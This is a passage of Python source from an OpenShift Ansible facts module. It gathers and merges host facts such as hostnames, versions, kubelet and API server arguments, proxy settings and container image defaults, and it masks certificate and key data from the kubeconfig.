        needs generalizing before it can be re-enabled.)

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with node.nodename
    """
    if 'node' in facts and 'common' in facts:
        if 'cloudprovider' in facts and facts['cloudprovider']['kind'] == 'gce':
            instance_hostname = facts['provider']['metadata']['instance']['hostname']
            facts['node']['nodename'] = instance_hostname.split('.')[0]
        else:
            facts['node']['nodename'] = facts['common']['hostname'].lower()
    return facts
def migrate_oauth_template_facts(facts):
    """ Migrate the legacy singular master.oauth_template fact into the
        'login' slot of the plural master.oauth_templates dict, without
        clobbering an explicitly-set login template.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict with oauth template facts migrated
    """
    if 'master' in facts and 'oauth_template' in facts['master']:
        templates = facts['master'].setdefault('oauth_templates', {})
        templates.setdefault('login', facts['master']['oauth_template'])
    return facts
def format_url(use_ssl, hostname, port, path=''):
    """ Format a URL from its parts.

        Args:
            use_ssl (bool): https:// when True, http:// otherwise
            port (str or int): omitted from the URL only when it equals the
                scheme's default port string ('443' or '80')
            path (str): optional path component
        Returns:
            str: the assembled URL
    """
    scheme = 'https' if use_ssl else 'http'
    default_port = '443' if use_ssl else '80'
    netloc = hostname
    if port != default_port:
        netloc = "%s:%s" % (hostname, port)
    try:
        url = urlparse.urlunparse((scheme, netloc, path, '', '', ''))
    except AttributeError:
        # urlparse may have been imported as the function rather than the
        # module (py2/py3 compat); fall back to a bare urlunparse.
        # pylint: disable=undefined-variable
        url = urlunparse((scheme, netloc, path, '', '', ''))
    return url
def get_current_config(facts):
    """ Get the current openshift config on the host (roles plus a masked
        view of the kubeconfig, when available).

        Args:
            facts (dict): existing facts
        Returns:
            dict: the current openshift config
    """
    current_config = dict()
    roles = [role for role in facts if role not in ['common', 'provider']]
    for role in roles:
        if 'roles' in current_config:
            current_config['roles'].append(role)
        else:
            current_config['roles'] = [role]
        # TODO: parse the /etc/sysconfig/openshift-{master,node} config to
        # determine the location of files.
        # TODO: I suspect this isn't working right now, but it doesn't prevent
        # anything from working properly as far as I can tell, perhaps because
        # we override the kubeconfig path everywhere we use it?
        # Query kubeconfig settings
        kubeconfig_dir = '/var/lib/origin/openshift.local.certificates'
        if role == 'node':
            kubeconfig_dir = os.path.join(
                kubeconfig_dir, "node-%s" % facts['common']['hostname']
            )
        kubeconfig_path = os.path.join(kubeconfig_dir, '.kubeconfig')
        if os.path.isfile('/usr/bin/openshift') and os.path.isfile(kubeconfig_path):
            try:
                _, output, _ = module.run_command(  # noqa: F405
                    ["/usr/bin/openshift", "ex", "config", "view", "-o",
                     "json", "--kubeconfig=%s" % kubeconfig_path],
                    check_rc=False
                )
                config = json.loads(output)
                # Mask certificate/key material before storing the config.
                cad = 'certificate-authority-data'
                try:
                    for cluster in config['clusters']:
                        config['clusters'][cluster][cad] = 'masked'
                except KeyError:
                    pass
                try:
                    for user in config['users']:
                        config['users'][user][cad] = 'masked'
                        config['users'][user]['client-key-data'] = 'masked'
                except KeyError:
                    pass
                current_config['kubeconfig'] = config
            # override pylint broad-except warning, since we do not want
            # to bubble up any exceptions if oc config view
            # fails
            # pylint: disable=broad-except
            except Exception:
                pass
    return current_config
def build_kubelet_args(facts):
    """ Build the node kubelet_args fact from cloudprovider and label facts.

        Args:
            facts (dict): existing facts
        Returns:
            dict: facts, with node.kubelet_args merged in when a supported
                  cloudprovider or node labels are configured
    """
    cloud_cfg_path = os.path.join(
        facts['common']['config_base'],
        'cloudprovider')
    # We only have to do this stuff on hosts that are nodes
    if 'node' in facts:
        # Any changes to the kubeletArguments parameter are collected here
        # first; values are lists per the kubeletArguments schema.
        kubelet_args = {}
        if 'cloudprovider' in facts and 'kind' in facts['cloudprovider']:
            kind = facts['cloudprovider']['kind']
            if kind in ('aws', 'openstack', 'gce'):
                kubelet_args['cloud-provider'] = [kind]
                kubelet_args['cloud-config'] = [cloud_cfg_path + '/' + kind + '.conf']
        # Automatically add node-labels to the kubeletArguments
        # parameter. See BZ1359848 for additional details.
        # Ref: https://bugzilla.redhat.com/show_bug.cgi?id=1359848
        if isinstance(facts['node'].get('labels'), dict):
            # {'foo': 'bar', 'a': 'b'} -> ['foo=bar', 'a=b']
            labels_str = ['='.join(item) for item in facts['node']['labels'].items()]
            # Bugfix: the previous check compared this list against '' which
            # is always true, so an empty labels dict injected an empty
            # node-labels entry into the kubelet arguments.
            if labels_str:
                kubelet_args['node-labels'] = labels_str
        # Only merge when something was actually collected.
        if kubelet_args:
            facts = merge_facts({'node': {'kubelet_args': kubelet_args}}, facts, [], [])
    return facts
def build_controller_args(facts):
    """ Build the master controller_args fact from cloudprovider facts.

        Args:
            facts (dict): existing facts
        Returns:
            dict: facts, with master.controller_args merged in when a
                  supported cloudprovider is configured
    """
    cloud_cfg_path = os.path.join(facts['common']['config_base'],
                                  'cloudprovider')
    if 'master' in facts:
        controller_args = {}
        if 'cloudprovider' in facts and 'kind' in facts['cloudprovider']:
            kind = facts['cloudprovider']['kind']
            # aws/openstack/gce each get a provider flag plus a config file
            # under the cloudprovider config directory.
            if kind in ('aws', 'openstack', 'gce'):
                controller_args['cloud-provider'] = [kind]
                controller_args['cloud-config'] = [cloud_cfg_path + '/' + kind + '.conf']
        if controller_args:
            facts = merge_facts({'master': {'controller_args': controller_args}}, facts, [], [])
    return facts
def build_api_server_args(facts):
    """ Build the master api_server_args fact from cloudprovider facts.

        Args:
            facts (dict): existing facts
        Returns:
            dict: facts, with master.api_server_args merged in when a
                  supported cloudprovider is configured
    """
    cloud_cfg_path = os.path.join(facts['common']['config_base'],
                                  'cloudprovider')
    if 'master' in facts:
        api_server_args = {}
        if 'cloudprovider' in facts and 'kind' in facts['cloudprovider']:
            kind = facts['cloudprovider']['kind']
            # aws/openstack/gce each get a provider flag plus a config file
            # under the cloudprovider config directory.
            if kind in ('aws', 'openstack', 'gce'):
                api_server_args['cloud-provider'] = [kind]
                api_server_args['cloud-config'] = [cloud_cfg_path + '/' + kind + '.conf']
        if api_server_args:
            facts = merge_facts({'master': {'api_server_args': api_server_args}}, facts, [], [])
    return facts
def is_service_running(service):
    """ Query systemd over D-Bus and return True when the named service
        unit is loaded and active; any D-Bus failure yields False.

        Args:
            service (str): service name, with or without '.service' suffix
        Returns:
            bool: whether the service is running
    """
    running = False
    try:
        bus = SystemBus()
        systemd = bus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
        manager = Interface(systemd, dbus_interface='org.freedesktop.systemd1.Manager')
        if service.endswith('.service'):
            unit = service
        else:
            unit = manager.GetUnit('{0}.service'.format(service))
        unit_proxy = bus.get_object('org.freedesktop.systemd1', str(unit))
        unit_props = Interface(unit_proxy, dbus_interface='org.freedesktop.DBus.Properties')
        load_state = unit_props.Get('org.freedesktop.systemd1.Unit', 'LoadState')
        active_state = unit_props.Get('org.freedesktop.systemd1.Unit', 'ActiveState')
        running = load_state == 'loaded' and active_state == 'active'
    except DBusException:
        # Unknown unit or unreachable bus: report not running.
        pass
    return running
def rpm_rebuilddb():
    """ Run `rpm --rebuilddb` to rebuild the host's rpm database.
        ('module' is the file-level Ansible module handle defined elsewhere.)
    """
    module.run_command(['/usr/bin/rpm', '--rebuilddb'])
def get_version_output(binary, version_cmd):
    """ Run the version command for the given binary and return its stdout.

        Args:
            binary (str or list): path to the binary (or argv prefix list)
            version_cmd (str or list): version subcommand / arguments
        Returns:
            str: stdout of the command, or '' when the binary is missing
    """
    cmd = []
    for item in (binary, version_cmd):
        if isinstance(item, list):
            cmd.extend(item)
        else:
            cmd.append(item)
    # Bugfix: 'output' was previously only bound inside the isfile branch,
    # raising UnboundLocalError when the binary did not exist.
    output = ''
    if os.path.isfile(cmd[0]):
        _, output, _ = module.run_command(cmd)
    return output
def get_docker_version_info():
    """ Parse `docker version` output into api_version/version facts.

        Returns:
            dict or None: {'api_version': ..., 'version': ...} when the
            docker (or container-engine) service is running and the output
            has a 'Server' section, otherwise None.
    """
    if not (is_service_running('docker') or is_service_running('container-engine')):
        return None
    version_info = yaml.safe_load(get_version_output('/usr/bin/docker', 'version'))
    if 'Server' not in version_info:
        return None
    return {
        'api_version': version_info['Server']['API version'],
        'version': version_info['Server']['Version']
    }
def get_hosted_registry_insecure():
    """ Check whether the docker daemon options in /etc/sysconfig/docker
        contain an insecure-registry flag.

        Returns:
            True when an insecure-registry option is present, otherwise
            None (file missing, unreadable or unparseable — deliberately
            best-effort).
    """
    hosted_registry_insecure = None
    if os.path.exists('/etc/sysconfig/docker'):
        try:
            # Prepend a [root] section header so the sysconfig file can be
            # parsed with configparser.
            with open('/etc/sysconfig/docker', 'r') as docker_cfg:
                ini_str = text_type('[root]\n' + docker_cfg.read(), 'utf-8')
            config = configparser.RawConfigParser()
            config.readfp(io.StringIO(ini_str))
            if 'insecure-registry' in config.get('root', 'OPTIONS'):
                hosted_registry_insecure = True
        # pylint: disable=broad-except
        except Exception:
            pass
    return hosted_registry_insecure
def get_openshift_version(facts):
    """ Get the current version of openshift on the host, trying in order:
        an already-set facts['common']['version'], the /usr/bin/openshift
        binary, the containerized env files, and finally the
        /usr/local/bin/openshift binary.

        Args:
            facts (dict): existing facts
        Returns:
            str or None: the version with any '+commit' offset removed
    """
    version = None
    if 'common' in facts:
        if 'version' in facts['common'] and facts['common']['version'] is not None:
            return chomp_commit_offset(facts['common']['version'])
    if os.path.isfile('/usr/bin/openshift'):
        _, output, _ = module.run_command(['/usr/bin/openshift', 'version'])
        version = parse_openshift_version(output)
    elif 'common' in facts and 'is_containerized' in facts['common']:
        version = get_container_openshift_version(facts)
    # Last resort: check the /usr/local/bin location, only when nothing was
    # found above.
    if not version and os.path.isfile('/usr/local/bin/openshift'):
        _, output, _ = module.run_command(['/usr/local/bin/openshift', 'version'])
        version = parse_openshift_version(output)
    return chomp_commit_offset(version)
def chomp_commit_offset(version):
    """ Chomp any '+<commit>' suffix from a version string.

        Args:
            version: version to chomp (may be None)
        Returns:
            str or None: the chomped version, or None when version is None
    """
    if version is None:
        return None
    # split('+') on a string without '+' yields the whole string, so plain
    # versions pass through unchanged.
    return str(version).split('+')[0]
def get_container_openshift_version(facts):
    """ Read IMAGE_VERSION from the containerized systemd env files and
        normalize it to a plain version number.

        Args:
            facts (dict): existing facts (common.service_type selects the
                env file names)
        Returns:
            str or None: the version number, or None when not found
    """
    prefix = "IMAGE_VERSION="
    for template in ('/etc/sysconfig/%s-master', '/etc/sysconfig/%s-node'):
        env_path = template % facts['common']['service_type']
        if not os.path.exists(env_path):
            continue
        with open(env_path) as env_file:
            for line in env_file:
                if not line.startswith(prefix):
                    continue
                tag = line[len(prefix):].strip()
                # Drop the leading "v" and any "-<release>" suffix; only a
                # plain w.x.y.z version number is wanted here.
                if tag[0] == 'v':
                    tag = tag[1:]
                return tag.split("-")[0]
    return None
def parse_openshift_version(output):
    """ Extract the openshift version from `openshift version` output.

        Args:
            output (str): raw output, e.g. "openshift v3.1.1.6-64-g80b61da"
        Returns:
            str: the openshift version ('' when absent); any trailing
            "-<build>-g<commit>" is removed so a plain w.x.y.z version is
            returned for use as openshift_version in the playbooks/roles
    """
    component_versions = dict(line.split(' v')
                              for line in output.splitlines() if ' v' in line)
    return component_versions.get('openshift', '').split('-')[0]
def apply_provider_facts(facts, provider_facts):
    """ Apply provider facts to the existing facts, preferring the
        provider-reported IPs and letting choose_hostname pick between the
        provider hostname and the current common hostname.

        Args:
            facts (dict): existing facts
            provider_facts (dict): provider facts to apply
        Returns:
            dict: the merged facts
    """
    if not provider_facts:
        return facts
    # hostname fact paired with the ip fact it corresponds to
    for hostname_fact, ip_fact in [('hostname', 'ip'),
                                   ('public_hostname', 'public_ip')]:
        ip_value = provider_facts['network'].get(ip_fact)
        if ip_value:
            facts['common'][ip_fact] = ip_value
        facts['common'][hostname_fact] = choose_hostname(
            [provider_facts['network'].get(hostname_fact)],
            facts['common'][hostname_fact]
        )
    facts['provider'] = provider_facts
    return facts
# Disabling pylint too many branches. This function needs refactored
# but is a very core part of openshift_facts.
# pylint: disable=too-many-branches, too-many-nested-blocks
def merge_facts(orig, new, additive_facts_to_overwrite, protected_facts_to_overwrite):
    """ Recursively merge facts dicts

        Args:
            orig (dict): existing facts
            new (dict): facts to update
            additive_facts_to_overwrite (list): additive facts to overwrite,
                in jinja '.' notation (e.g. 'master.named_certificates')
            protected_facts_to_overwrite (list): protected facts to
                overwrite, in jinja '.' notation (e.g. 'master.ha')
        Returns:
            dict: the merged facts
    """
    additive_facts = ['named_certificates']
    protected_facts = ['ha']
    # Facts we do not ever want to merge. These originate in inventory variables
    # and contain JSON dicts. We don't ever want to trigger a merge
    inventory_json_facts = ['admission_plugin_config',
                            'kube_admission_plugin_config',
                            'image_policy_config',
                            "builddefaults",
                            "buildoverrides"]
    facts = dict()
    for key, value in iteritems(orig):
        # Key exists in both old and new facts.
        if key in new:
            if key in inventory_json_facts:
                # JSON facts may arrive as strings (can happen when the JSON
                # contains a boolean); load rather than merge them.
                if isinstance(new[key], string_types):
                    facts[key] = yaml.safe_load(new[key])
                else:
                    facts[key] = copy.deepcopy(new[key])
            # Both sides are dicts: recurse with the subset of overwrite
            # entries that apply to this key's subtree.
            elif isinstance(value, dict) and isinstance(new[key], dict):
                relevant_additive_facts = []
                for item in additive_facts_to_overwrite:
                    if '.' in item and item.startswith(key + '.'):
                        relevant_additive_facts.append(item)
                relevant_protected_facts = []
                for item in protected_facts_to_overwrite:
                    if '.' in item and item.startswith(key + '.'):
                        relevant_protected_facts.append(item)
                facts[key] = merge_facts(value, new[key], relevant_additive_facts, relevant_protected_facts)
            # Additive fact not being overwritten: append new values to the
            # existing list, skipping duplicates.
            elif key in additive_facts and key not in [x.split('.')[-1] for x in additive_facts_to_overwrite]:
                if isinstance(value, list) and isinstance(new[key], list):
                    new_fact = []
                    for item in copy.deepcopy(value) + copy.deepcopy(new[key]):
                        if item not in new_fact:
                            new_fact.append(item)
                    facts[key] = new_fact
            # Protected fact not being overwritten: keep the old value and
            # fail hard when the caller tries to change it.
            elif key in protected_facts and key not in [x.split('.')[-1] for x in protected_facts_to_overwrite]:
                if key == 'ha':
                    if safe_get_bool(value) != safe_get_bool(new[key]):
                        module.fail_json(msg='openshift_facts received a different value for openshift.master.ha')
                    else:
                        facts[key] = value
            # No other condition matched: the new value wins.
            else:
                facts[key] = copy.deepcopy(new[key])
        # Key only exists in orig: keep it.
        else:
            facts[key] = copy.deepcopy(value)
    new_keys = set(new.keys()) - set(orig.keys())
    for key in new_keys:
        # Watchout for JSON facts that sometimes load as strings.
        # (can happen if the JSON contains a boolean)
        if key in inventory_json_facts and isinstance(new[key], string_types):
            facts[key] = yaml.safe_load(new[key])
        else:
            facts[key] = copy.deepcopy(new[key])
    return facts
def save_local_facts(filename, facts):
    """ Save local facts to a JSON file, creating the parent directory when
        needed and restricting the file to owner read/write.

        Args:
            filename (str): local facts file path
            facts (dict): facts to save
        Raises:
            OpenShiftFactsFileWriteError: when the file cannot be written
    """
    try:
        fact_dir = os.path.dirname(filename)
        try:
            os.makedirs(fact_dir)  # try to make the directory
        except OSError as exception:
            if exception.errno != errno.EEXIST:  # but it is okay if it is already there
                raise  # pass any other exceptions up the chain
        with open(filename, 'w') as fact_file:
            fact_file.write(module.jsonify(facts))  # noqa: F405
        os.chmod(filename, 0o600)
    except (IOError, OSError) as ex:
        raise OpenShiftFactsFileWriteError(
            "Could not create fact file: %s, error: %s" % (filename, ex)
        )
def get_local_facts_from_file(filename):
    """ Retrieve local facts from a fact file, handling both the legacy INI
        format and the JSON format.

        Args:
            filename (str): local facts file path
        Returns:
            dict: the retrieved facts (empty when the file is missing or
                  unparseable)
    """
    local_facts = dict()
    try:
        # Handle conversion of INI style facts file to json style
        ini_facts = configparser.SafeConfigParser()
        ini_facts.read(filename)
        for section in ini_facts.sections():
            local_facts[section] = dict()
            for key, value in ini_facts.items(section):
                local_facts[section][key] = value
    except (configparser.MissingSectionHeaderError,
            configparser.ParsingError):
        # Not INI: fall back to reading the file as JSON.
        try:
            with open(filename, 'r') as facts_file:
                local_facts = json.load(facts_file)
        except (ValueError, IOError):
            pass
    return local_facts
def sort_unique(alist):
    """ Return a sorted list of the unique elements of alist.

        Args:
            alist (list): list to deduplicate and sort
        Returns:
            list: sorted unique elements
    """
    # sorted() already returns a list, so wrapping the set in list() first
    # was redundant (flake8-comprehensions C414).
    return sorted(set(alist))
def safe_get_bool(fact):
    """ Convert a fact that may be a bool or a truthy/falsy string
        ('yes', 'no', 'true', '0', ...) into a real bool via strtobool;
        raises ValueError for unrecognized strings.
    """
    return bool(strtobool(str(fact)))
def set_proxy_facts(facts):
    """ Set global proxy facts: normalize common.no_proxy into a list and,
        when host generation is enabled, extend it and join it back into a
        comma-separated string.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict with proxy facts normalized
    """
    if 'common' not in facts:
        return facts
    common = facts['common']
    has_proxy_config = ('http_proxy' in common or 'https_proxy' in common
                        or 'no_proxy' in common)
    if has_proxy_config:
        # Normalize no_proxy to a list for the manipulation below.
        if 'no_proxy' in common and isinstance(common['no_proxy'], string_types):
            common['no_proxy'] = common['no_proxy'].split(",")
        elif 'no_proxy' not in common:
            common['no_proxy'] = []
        no_proxy = common['no_proxy']
        # See https://bugzilla.redhat.com/show_bug.cgi?id=1466783
        # masters behind a proxy need to connect to etcd via IP
        if 'no_proxy_etcd_host_ips' in common:
            if isinstance(common['no_proxy_etcd_host_ips'], string_types):
                no_proxy.extend(common['no_proxy_etcd_host_ips'].split(','))
        if 'generate_no_proxy_hosts' in common and safe_get_bool(common['generate_no_proxy_hosts']):
            if 'no_proxy_internal_hostnames' in common:
                no_proxy.extend(common['no_proxy_internal_hostnames'].split(','))
            # We always add local dns domain and ourselves no matter what
            no_proxy.extend(['.' + common['dns_domain'], '.svc', common['hostname']])
            common['no_proxy'] = ','.join(sort_unique(no_proxy))
    facts['common'] = common
    return facts
def set_builddefaults_facts(facts):
    """ Set build defaults: inherit http_proxy/https_proxy/no_proxy from the
        common facts, derive the git_* variants from the generic ones, and
        merge any builddefaults config into the BuildDefaults admission
        plugin configuration.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with the build defaults
    """
    if 'builddefaults' in facts:
        builddefaults = facts['builddefaults']
        common = facts['common']
        # Inherit cluster-wide proxy settings when not explicitly set.
        for key in ('http_proxy', 'https_proxy', 'no_proxy'):
            if key not in builddefaults and key in common:
                builddefaults[key] = common[key]
        # Create git specific facts from generic values, if git specific
        # values are not defined.
        for key in ('http_proxy', 'https_proxy', 'no_proxy'):
            git_key = 'git_' + key
            if git_key not in builddefaults and key in builddefaults:
                builddefaults[git_key] = builddefaults[key]
        # If we're actually defining a builddefaults config, create/merge
        # the BuildDefaults admission plugin configuration.
        if 'config' in builddefaults:
            if 'admission_plugin_config' not in facts['master']:
                facts['master']['admission_plugin_config'] = {'BuildDefaults': {'configuration': {'env': {}}}}
            facts['master']['admission_plugin_config'].update(builddefaults['config'])
            delete_empty_keys(facts['master']['admission_plugin_config']['BuildDefaults']['configuration']['env'])
    return facts
def delete_empty_keys(keylist):
    """ Remove, in place, every entry of keylist whose 'value' is empty.

        Args:
            keylist (list): list of {'name': ..., 'value': ...} dicts
    """
    # Slice-assign so the caller's list object is mutated in place, instead
    # of the original's delete-while-iterating counter dance.
    keylist[:] = [entry for entry in keylist if len(entry['value']) != 0]
def set_buildoverrides_facts(facts):
    """ Merge any buildoverrides config into the master admission plugin
        configuration, creating it when absent.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with the build overrides
    """
    if 'buildoverrides' in facts:
        buildoverrides = facts['buildoverrides']
        if 'config' in buildoverrides:
            master = facts['master']
            master.setdefault('admission_plugin_config', dict())
            master['admission_plugin_config'].update(buildoverrides['config'])
    return facts
# pylint: disable=too-many-statements
def set_container_facts_if_unset(facts):
    """Set container/image related facts that were not provided already.

    Picks the image names for the deployment type (enterprise vs. origin),
    records whether the host is an Atomic host, and fills in every image
    fact the inventory did not supply.  Returns the updated facts dict.
    """
    deployment_type = facts['common']['deployment_type']
    if deployment_type == 'openshift-enterprise':
        master_image = 'openshift3/ose'
        cli_image = master_image
        node_image = 'openshift3/node'
        ovs_image = 'openshift3/openvswitch'
        etcd_image = 'registry.access.redhat.com/rhel7/etcd'
        pod_image = 'openshift3/ose-pod'
        router_image = 'openshift3/ose-haproxy-router'
        registry_image = 'openshift3/ose-docker-registry'
        deployer_image = 'openshift3/ose-deployer'
    else:
        master_image = 'openshift/origin'
        cli_image = master_image
        node_image = 'openshift/node'
        ovs_image = 'openshift/openvswitch'
        etcd_image = 'registry.access.redhat.com/rhel7/etcd'
        pod_image = 'openshift/origin-pod'
        router_image = 'openshift/origin-haproxy-router'
        registry_image = 'openshift/origin-docker-registry'
        deployer_image = 'openshift/origin-deployer'

    # /run/ostree-booted only exists on (rpm-)ostree based systems.
    facts['common']['is_atomic'] = os.path.isfile('/run/ostree-booted')

    # If openshift_docker_use_system_container is set and is True ....
    if 'use_system_container' in list(facts['docker'].keys()):
        if facts['docker']['use_system_container']:
            # ... set the service name to container-engine
            facts['docker']['service_name'] = 'container-engine'

    # Every fact below is only filled in when not already present ("if unset").
    if 'is_containerized' not in facts['common']:
        facts['common']['is_containerized'] = facts['common']['is_atomic']
    if 'cli_image' not in facts['common']:
        facts['common']['cli_image'] = cli_image
    if 'pod_image' not in facts['common']:
        facts['common']['pod_image'] = pod_image
    if 'router_image' not in facts['common']:
        facts['common']['router_image'] = router_image
    if 'registry_image' not in facts['common']:
        facts['common']['registry_image'] = registry_image
    if 'deployer_image' not in facts['common']:
        facts['common']['deployer_image'] = deployer_image
    if 'etcd' in facts and 'etcd_image' not in facts['etcd']:
        facts['etcd']['etcd_image'] = etcd_image
    if 'master' in facts and 'master_image' not in facts['master']:
        # The system image mirrors the regular image and is only set when
        # master_image itself was unset.
        facts['master']['master_image'] = master_image
        facts['master']['master_system_image'] = master_image
    if 'node' in facts:
        if 'node_image' not in facts['node']:
            facts['node']['node_image'] = node_image
            facts['node']['node_system_image'] = node_image
        if 'ovs_image' not in facts['node']:
            facts['node']['ovs_image'] = ovs_image
            facts['node']['ovs_system_image'] = ovs_image

    # Containerized installs use the wrapper binaries under /usr/local/bin.
    if safe_get_bool(facts['common']['is_containerized']):
        facts['common']['admin_binary'] = '/usr/local/bin/oadm'
        facts['common']['client_binary'] = '/usr/local/bin/oc'

    return facts
def set_installed_variant_rpm_facts(facts):
    """Record which openshift variant RPMs are installed on this host.

    Probes ``rpm -q`` for every known variant package name (openshift,
    atomic-openshift, origin plus their sub-packages) and stores the list
    of installed names in facts['common']['installed_variant_rpms'].
    """
    installed_rpms = []
    for base_rpm in ['openshift', 'atomic-openshift', 'origin']:
        optional_rpms = ['master', 'node', 'clients', 'sdn-ovs']
        variant_rpms = [base_rpm] + \
            ['{0}-{1}'.format(base_rpm, r) for r in optional_rpms] + \
            ['tuned-profiles-%s-node' % base_rpm]
        for rpm in variant_rpms:
            # rpm -q exits 0 only when the package is installed.
            exit_code, _, _ = module.run_command(['rpm', '-q', rpm])  # noqa: F405
            if exit_code == 0:
                installed_rpms.append(rpm)

    facts['common']['installed_variant_rpms'] = installed_rpms
    return facts
class OpenShiftFactsInternalError(Exception):
    """Internal error while generating openshift facts."""
    pass


class OpenShiftFactsUnsupportedRoleError(Exception):
    """Requested role is not listed in OpenShiftFacts.known_roles."""
    pass


class OpenShiftFactsFileWriteError(Exception):
    """Error writing the local facts file."""
    pass


class OpenShiftFactsMetadataUnavailableError(Exception):
    """Cloud provider metadata could not be retrieved."""
    pass
class OpenShiftFacts(object):
    """Generates and persists the openshift facts for a single host.

    Combines system facts, cloud provider metadata, role defaults and the
    locally cached facts file into the final ``openshift`` fact namespace.
    """

    # Roles this module knows how to generate facts for; __init__ rejects
    # anything else with OpenShiftFactsUnsupportedRoleError.
    known_roles = ['builddefaults',
                   'buildoverrides',
                   'cloudprovider',
                   'common',
                   'docker',
                   'etcd',
                   'hosted',
                   'master',
                   'node',
                   'logging',
                   'loggingops',
                   'metrics']

    # Disabling too-many-arguments, this should be cleaned up as a TODO item.
    # pylint: disable=too-many-arguments,no-value-for-parameter
    def __init__(self, role, filename, local_facts,
                 additive_facts_to_overwrite=None,
                 openshift_env=None,
                 openshift_env_structures=None,
                 protected_facts_to_overwrite=None):
        """Gather system facts and generate the openshift facts.

        :param role: role to generate facts for (must be in known_roles)
        :param filename: path of the local facts cache file
        :param local_facts: facts supplied by the play for this role
        :param additive_facts_to_overwrite: additive facts allowed to be replaced
        :param openshift_env: openshift_env_* inventory variables
        :param openshift_env_structures: patterns describing structured env facts
        :param protected_facts_to_overwrite: protected facts allowed to be replaced
        :raises OpenShiftFactsUnsupportedRoleError: for an unknown role
        """
        self.changed = False
        self.filename = filename
        if role not in self.known_roles:
            raise OpenShiftFactsUnsupportedRoleError(
                "Role %s is not supported by this module" % role
            )
        self.role = role

        # Collect system facts and preface each fact with 'ansible_'.
        try:
            # pylint: disable=too-many-function-args,invalid-name
            self.system_facts = ansible_facts(module, ['hardware', 'network', 'virtual', 'facter'])  # noqa: F405
            additional_facts = {}
            for (k, v) in self.system_facts.items():
                additional_facts["ansible_%s" % k.replace('-', '_')] = v
            self.system_facts.update(additional_facts)
        except UnboundLocalError:
            # ansible-2.2,2.3 expose the facts through get_all_facts instead.
            self.system_facts = get_all_facts(module)['ansible_facts']  # noqa: F405

        self.facts = self.generate_facts(local_facts,
                                         additive_facts_to_overwrite,
                                         openshift_env,
                                         openshift_env_structures,
                                         protected_facts_to_overwrite)
    def generate_facts(self,
                       local_facts,
                       additive_facts_to_overwrite,
                       openshift_env,
                       openshift_env_structures,
                       protected_facts_to_overwrite):
        """Build the final facts dict for this host.

        Merges role defaults, provider facts and local facts, then runs the
        result through the module-level ``set_*`` normalizers.  The call
        order matters: later normalizers read facts produced by earlier
        ones (e.g. set_installed_variant_rpm_facts depends on
        is_containerized set by set_container_facts_if_unset).

        :returns: dict with a single top-level 'openshift' key
        """
        local_facts = self.init_local_facts(local_facts,
                                            additive_facts_to_overwrite,
                                            openshift_env,
                                            openshift_env_structures,
                                            protected_facts_to_overwrite)
        roles = local_facts.keys()

        # deployment_type / deployment_subtype default to origin / basic.
        if 'common' in local_facts and 'deployment_type' in local_facts['common']:
            deployment_type = local_facts['common']['deployment_type']
        else:
            deployment_type = 'origin'

        if 'common' in local_facts and 'deployment_subtype' in local_facts['common']:
            deployment_subtype = local_facts['common']['deployment_subtype']
        else:
            deployment_subtype = 'basic'

        defaults = self.get_defaults(roles, deployment_type, deployment_subtype)
        provider_facts = self.init_provider_facts()
        facts = apply_provider_facts(defaults, provider_facts)
        facts = merge_facts(facts,
                            local_facts,
                            additive_facts_to_overwrite,
                            protected_facts_to_overwrite)
        facts = migrate_oauth_template_facts(facts)
        facts['current_config'] = get_current_config(facts)
        facts = set_url_facts_if_unset(facts)
        facts = set_project_cfg_facts_if_unset(facts)
        facts = set_node_schedulability(facts)
        facts = set_selectors(facts)
        facts = set_identity_providers_if_unset(facts)
        facts = set_deployment_facts_if_unset(facts)
        facts = set_sdn_facts_if_unset(facts, self.system_facts)
        facts = set_container_facts_if_unset(facts)
        facts = build_kubelet_args(facts)
        facts = build_controller_args(facts)
        facts = build_api_server_args(facts)
        facts = set_version_facts_if_unset(facts)
        facts = set_dnsmasq_facts_if_unset(facts)
        facts = set_aggregate_facts(facts)
        facts = set_etcd_facts_if_unset(facts)
        facts = set_proxy_facts(facts)
        facts = set_builddefaults_facts(facts)
        facts = set_buildoverrides_facts(facts)
        # RPM based installs additionally record the installed variant rpms.
        if not safe_get_bool(facts['common']['is_containerized']):
            facts = set_installed_variant_rpm_facts(facts)
        facts = set_nodename(facts)
        return dict(openshift=facts)
    def get_defaults(self, roles, deployment_type, deployment_subtype):
        """Return the default facts for the requested roles.

        :param roles: iterable of role names facts are generated for
        :param deployment_type: e.g. 'origin' or 'openshift-enterprise'
        :param deployment_subtype: e.g. 'basic'
        :returns: dict of per-role default facts
        """
        defaults = {}

        ip_addr = self.system_facts['ansible_default_ipv4']['address']

        # Candidate hostnames: `hostname -f` output, the kernel nodename and
        # ansible's fqdn; choose_hostname picks the first usable one.
        exit_code, output, _ = module.run_command(['hostname', '-f'])  # noqa: F405
        hostname_f = output.strip() if exit_code == 0 else ''
        hostname_values = [hostname_f, self.system_facts['ansible_nodename'],
                           self.system_facts['ansible_fqdn']]
        hostname = choose_hostname(hostname_values, ip_addr).lower()

        defaults['common'] = dict(ip=ip_addr,
                                  public_ip=ip_addr,
                                  deployment_type=deployment_type,
                                  deployment_subtype=deployment_subtype,
                                  hostname=hostname,
                                  public_hostname=hostname,
                                  portal_net='172.30.0.0/16',
                                  client_binary='oc', admin_binary='oadm',
                                  dns_domain='cluster.local',
                                  debug_level=2,
                                  config_base='/etc/origin')

        if 'master' in roles:
            defaults['master'] = dict(api_use_ssl=True, api_port='8443',
                                      controllers_port='8444',
                                      console_use_ssl=True,
                                      console_path='/console',
                                      console_port='8443', etcd_use_ssl=True,
                                      etcd_hosts='', etcd_port='4001',
                                      portal_net='172.30.0.0/16',
                                      embedded_etcd=True, embedded_kube=True,
                                      embedded_dns=True,
                                      bind_addr='0.0.0.0',
                                      session_max_seconds=3600,
                                      session_name='ssn',
                                      session_secrets_file='',
                                      access_token_max_seconds=86400,
                                      auth_token_max_seconds=500,
                                      oauth_grant_method='auto',
                                      dynamic_provisioning_enabled=True,
                                      max_requests_inflight=500)

        if 'node' in roles:
            defaults['node'] = dict(labels={}, annotations={},
                                    iptables_sync_period='30s',
                                    local_quota_per_fsgroup="",
                                    set_node_ip=False)

        if 'docker' in roles:
            docker = dict(disable_push_dockerhub=False,
                          options='--log-driver=journald')
